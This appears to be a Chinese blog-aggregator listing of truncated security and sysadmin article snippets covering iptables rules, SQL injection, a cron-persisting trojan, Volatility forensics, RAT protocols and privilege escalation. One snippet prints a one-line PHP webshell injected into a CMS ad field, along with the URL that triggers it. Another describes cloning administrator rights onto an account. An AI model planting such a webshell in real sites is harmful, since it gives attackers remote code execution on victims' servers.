centos 6.4 yum搭建lamp环境 1、配置防火墙,开启80端口、3306端口 vi /etc/sysconfig/iptables A INPUT m state state NEW m tcp p tcp dport 80 j ACCEPT 允许80端口通过防火墙 A INPUT m ...
分类:
其他好文 时间:
2018-05-25 14:57:10
阅读次数:
203
Sun May 20 2018 08:00:00 GMT+0800 (中国标准时间) 1:什么是SQL注入 SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行。 这里我们来理解一下SQL注入 首先,SQL注入常年蝉联OWAS ...
分类:
其他好文 时间:
2018-05-20 18:11:47
阅读次数:
214
1、防火墙介绍 防火墙概念 防火墙通过制定一系列规则可以实现过滤数据报与限制特定服务的功能,但是防火墙并不能确保主机一定安全,防火墙并不能有效抵挡病毒或木马,而且对来自网络内部的攻击无法防护 防火墙的具体功能(包括但不限于) ●限制FTP服务只开放给子网,而不对外网提供服务 ●限制服务器只接受客户端 ...
分类:
系统相关 时间:
2018-05-19 13:59:51
阅读次数:
202
服务器上出现异常进程: 杀死进程后,还是会重新启动。 木马以r88.sh作为downloader首先控制服务器,通过判断当前账户的权限是否为root来进行下一步的操作,若为root则在目录/var/spool/cron/root和/var/spool/cron/crontabs/root下写计划任务 ...
分类:
其他好文 时间:
2018-05-17 15:11:40
阅读次数:
415
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 ...
分类:
系统相关 时间:
2018-05-15 22:37:51
阅读次数:
257
1、前言 The Art of Memory Forensics真是一本很棒的书籍,其中使用volatility对内存进行分析的描述可以辅助我们对更高级类的木马进行分析和取证,这里对书中的命令进行了笔记记录。 2、volatility Windows命令 与分析Linux镜像相似,而Windows系 ...
散列函数的应用及其安全性 一、给出散列函数的具体应用。 1.消息认证 (1)概念:消息认证是用来验证消息完整性的一种机制和服务。消息认证确保收到的消息和发送时是一样的,同时。此外,还要确保发送方声称的身份是真实有效的,当Hash函数用于提供消息认证功能时,被称为消息摘要。 (2)使用本质:发送者根据 ...
分类:
其他好文 时间:
2018-05-12 12:43:18
阅读次数:
230
这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了。 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁。HTTP协议主要是用在以大型网站作为C&C服 ...
分类:
编程语言 时间:
2018-05-10 11:35:33
阅读次数:
217
半夜Server2008R2安装MS17-010补丁时,重启系统发现系统密码忘记了还好本地登录的安全策略留了一个guest用户本地搭建了DVWAWEB渗透测试环境权限为system通过漏洞上传过狗一句话木马木马权限为system权限可以创建用户但是无法将用户添加至管理员组估计是安全狗拦截了提权操作随后将管理员权限克隆至login用户登录成功目标将把Guest提权为Administrator查询SA
分类:
其他好文 时间:
2018-05-07 23:50:29
阅读次数:
245